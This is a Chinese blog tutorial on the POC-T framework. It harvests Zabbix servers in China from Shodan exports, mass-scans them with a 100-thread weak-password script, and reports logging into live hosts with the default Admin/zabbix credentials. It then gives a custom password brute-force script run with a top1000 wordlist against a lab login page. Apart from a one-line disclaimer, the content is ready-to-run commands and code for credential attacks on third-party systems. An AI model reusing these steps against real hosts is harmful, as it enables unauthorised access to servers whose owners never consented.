MENU

POC-T框架使用之扫描zabbix弱密码

本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担

框架使用

python2.7环境使用

git clone https://github.com/Xyntax/POC-T
pip install -r requirement.txt
python POC-T.py:查看参数

常用参数:

  • -s:指定要使用script文件夹里面的哪个脚本
  • -t:指定线程数
  • -iS:指定单个目标,ip或者域名都可以
  • -iF:指定多个目标(文件),我们今天就用到这个参数
  • -aZ/aS/aG/aF:使用钟馗之眼/shodan/google开发者/fofa功能,使用这些需要先配置toolkit.conf
  • --limit:在使用上面这些搜索引擎搜索数据时限定需要的目标数量
  • --update:更新POC-T

解析shodan下载的数据

shodan搜索Zabbix country:"CN"获得zabbix数据,下载

cmd里安装pythonshodan模块解析下载下来的数据

(当然你也可以在命令行使用shodan直接进行搜索和下载数据)

pip install shodan
shodan parse --fields ip_str,port,org --separator , shodan-export.json_2.gz

shodan parse --fields ip_str,port --separator , shodan-export.json_2.gz > urls.txt

到处数据,打开urls.txt替换,:

POC-T使用脚本批量扫描弱密码

python POC-T.py -s zabbix-weakpass -t 100 -iF urls.txt

可以看到4年前的69个结果,目前还剩5个,使用弱密码Admin/zabbix登录

登上去发现都是空的了,不过没关系,只是抛砖引玉:

POC-T使用自己写的脚本

可以参考官方脚本编写教程

编写自定义脚本,只需要声明一个函数作为接口,没有其他任何限制.从此告别文档,无需记忆函数名和模板调用,使效率最大化.

我这里以前几天写的文章BruteForce_test 暴力破解练习Level-1为例子

安装http请求转换插件http-script-generator,请求右键

转换为python的代码如下:

没有放在POC-T框架里跑的效果如下:

那根据POC-T脚本编写规则,脚本编写如下:

(最开始放在POC-T框架里跑不出来,后面想了下是python2.7没有format等函数以及中文字符解码的问题)

# coding=utf-8
import requests


def poc(dict):
    try:
        paramsPost = {"name": "admin", "password": dict}
        headers = {"Connection": "close"}
        response = requests.post(
            "http://192.168.1.11/BruteForc_test/Loginl.php", data=paramsPost, headers=headers)
        if u"登陆成功" in response.content.decode('utf8'):
            return "login success,password:" + dict
    except:
        return False

使用top1000字典,设置10进程破解:

python POC-T.py -s BruteForce_test -t 10 -iF top1000.txt

还有一个小问题,如何成功之后立马退出而不是等待所有字典跑完,后面我知道了会更新在这里

现在你就拥有了一个多线程异步的框架,不用担心线程管理的等问题,而且它还有很多内置的脚本库

于是乎之前一直拖欠的phpmyadmin多线程爆破脚本也就迎刃而解了,我会更新到原文章里

参考文章:

本文完。